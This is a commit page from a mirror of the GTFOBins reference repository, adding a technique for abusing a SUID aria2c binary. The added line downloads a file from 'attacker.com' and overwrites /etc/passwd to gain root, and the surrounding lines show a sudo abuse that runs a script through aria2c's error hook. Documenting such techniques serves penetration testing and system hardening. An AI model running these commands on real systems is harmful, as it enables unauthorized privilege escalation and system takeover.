mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Add SUID method to aria2c
Found this new method of abusing aria2c's suid for privilege escalation.
This commit is contained in:
parent
f4e71b63cb
commit
42cac0885e
@ -17,6 +17,10 @@ functions:
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
sudo aria2c --on-download-error=$TF http://x
|
||||
suid:
|
||||
- code: |
|
||||
aria2c -d /etc/ -o passwd "http://attacker.com/passwd" --allow-overwrite=true
|
||||
- description: Remote download and replace /etc/passwd with root privilege.
|
||||
limited-suid:
|
||||
- code: |
|
||||
COMMAND='id'
|
||||
|
Loading…
Reference in New Issue
Block a user